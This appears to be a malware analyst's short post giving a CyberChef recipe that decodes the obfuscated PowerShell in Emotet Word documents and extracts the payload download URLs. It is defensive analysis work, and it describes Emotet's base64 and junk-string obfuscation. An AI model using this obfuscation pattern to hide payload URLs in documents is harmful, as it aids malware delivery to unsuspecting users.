2021-01-20 Emotet CyberChef Recipe

1. Emotet URL Decoder
2. ==================
3. 1. Open the .doc file using CyberChef
4. 2. Paste in the following CyberChef recipe:
5.  
6. Strings('Single byte',10000,'Alphanumeric + punctuation (A)',false)
7. Drop_bytes(0,144,false)
8. Find_/_Replace({'option':'Simple string','string':'sg yw
9. '},'',true,false,true,false)
10. Find_/_Replace({'option':'Simple
11. string','string':'ah'},'',true,false,true,false)
12. From_Base64('A-Za-z0-9+/=',true)
13. Decode_text('UTF-16LE (1200)')
14. Split('*','\\n')
15. Find_/_Replace({'option':'Simple
16. string','string':'\''},'',true,false,true,false)
17. Find_/_Replace({'option':'Simple
18. string','string':'+'},'',true,false,true,false)
19. Find_/_Replace({'option':'Simple
20. string','string':'('},'',true,false,true,false)
21. Find_/_Replace({'option':'Simple
22. string','string':')'},'',true,false,true,false)
23. Find_/_Replace({'option':'Simple
24. string','string':'`'},'',true,false,true,false)
25. Split('@','\\n')
26. Find_/_Replace({'option':'Simple
27. string','string':'ah'},'http',true,false,true,false)
28. Find_/_Replace({'option':'Simple string','string':'!sg'},'
29. ',true,false,true,false)
30. Extract_URLs(false)
31.  
32. I used this recipe today to extract all of the payload urls from about 25 Word documents.
33. It's highly likely that this will stop working at some point.
34. At the same time, I've been using the bottom half of this recipe for months now.
35. You just have to swap out some of the obfuscation characters because they change those regularly.
36.  
37. Thanks to the incredible Didier Stevens @DidierStevens for coming up with the original idea.
38. https://www.youtube.com/watch?v=pJvQgUk01k4
39.